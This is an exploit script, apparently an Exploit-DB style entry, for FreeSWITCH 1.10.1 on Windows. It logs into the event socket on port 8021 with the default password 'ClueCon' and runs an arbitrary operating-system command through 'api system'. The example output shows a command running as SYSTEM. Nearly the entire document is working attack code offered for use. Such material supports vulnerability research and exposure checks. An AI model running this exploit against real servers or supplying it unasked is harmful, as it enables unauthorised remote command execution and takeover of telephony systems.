52 lines
No EOL
1.4 KiB
Text
52 lines
No EOL
1.4 KiB
Text
# Exploit Title: FreeSWITCH 1.10.1 - Command Execution
|
|
# Date: 2019-12-19
|
|
# Exploit Author: 1F98D
|
|
# Vendor Homepage: https://freeswitch.com/
|
|
# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
|
|
# Version: 1.10.1
|
|
# Tested on: Windows 10 (x64)
|
|
#
|
|
# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to
|
|
# it after authenticating. By default commands are not accepted from remote hosts.
|
|
#
|
|
# -- Example --
|
|
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
|
|
# Authenticated
|
|
# Content-Type: api/response
|
|
# Content-Length: 20
|
|
#
|
|
# nt authority\system
|
|
#
|
|
|
|
#!/usr/bin/python3
|
|
|
|
from socket import *
|
|
import sys
|
|
|
|
if len(sys.argv) != 3:
|
|
print('Missing arguments')
|
|
print('Usage: freeswitch-exploit.py <target> <cmd>')
|
|
sys.exit(1)
|
|
|
|
ADDRESS=sys.argv[1]
|
|
CMD=sys.argv[2]
|
|
PASSWORD='ClueCon' # default password for FreeSWITCH
|
|
|
|
s=socket(AF_INET, SOCK_STREAM)
|
|
s.connect((ADDRESS, 8021))
|
|
|
|
response = s.recv(1024)
|
|
if b'auth/request' in response:
|
|
s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
|
|
response = s.recv(1024)
|
|
if b'+OK accepted' in response:
|
|
print('Authenticated')
|
|
s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
|
|
response = s.recv(8096).decode()
|
|
print(response)
|
|
else:
|
|
print('Authentication failed')
|
|
sys.exit(1)
|
|
else:
|
|
print('Not prompted for authentication, likely not vulnerable')
|
|
sys.exit(1) |